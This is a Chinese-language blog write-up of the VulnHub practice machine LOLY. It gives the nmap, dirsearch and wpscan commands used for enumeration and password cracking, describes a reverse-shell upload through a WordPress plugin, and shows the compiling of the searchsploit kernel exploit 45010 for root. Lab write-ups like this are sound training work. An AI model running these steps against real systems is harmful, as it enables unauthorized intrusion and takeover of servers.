靶机练习7:LOLY
靶机地址
https://www.vulnhub.com/entry/loly-1,538/
信息收集
扫描全端口,进行服务发现
nmap -n -v -sS -max-retries=0 -p- 172.16.33.25
发现只有80端口的web服务
进行进一步的版本发现和目录扫描(使用了nmap 的vuln脚本)
sudo nmap -p80 -script=vuln 172.16.33.25
发现有目录/wordpress
和wordpress/wp-login.php
,其中含有wordpress的登录页面
dirsearch -u 172.16.33.25 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
利用漏洞获取shell
访问/wordpress/wp-login.php
,随机输入账号密码,提示无法访问服务loly.lc
需要在/etc/hosts
进行域名解析
#oscp
172.16.33.25 loly.lc
重新访问,提示未知用户名
由于服务是wordpress
,可以使用工具wpscan
进行用户名枚举
wpscan --url http://172.16.33.25/wordpress -e
获取用户名为loly
,继续破解密码
wpscan --url http://172.16.33.25/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
使用获得的用户名和密码登录wordpress
后台
登录后台后找不到Appearance
下的Editor
,无法将木马写到404页面中
发现AdRotate
的Manage Media
中有上传点,可以尝试上传木马
使用/usr/share/webshells/php
下的php-reverse-shell.php
,将地址和端口改一下,改名后压缩为shell.zip
在Settings
处可以看到上传路径
在kali端监听设置端口,并在网页中访问wordpress/wp-content/banners/shell.php
,获得shell
提权
尝试上传 linpeas.sh 到靶机,发现不行,最后发现 /tmp
目录中才能上传成功
通过linpeas.sh
的提示,发现有现成的exploit
可利用
刚开始用了40871.c这个exploit, 发现在kali上编译成功后靶机上执行不了,直接传到靶机上也编译不成功
使用searchsploit
找到exploit
,在kali中进行编译
searchsploit -m 45010
gcc 45010.c -o exploit
传到靶机上,赋予执行权限后执行
成功获得root 权限,可查看 root.txt
参考资料
如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。
本文作者:cha0s32
本文链接:https://www.cnblogs.com/cha0s32/p/17250435.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步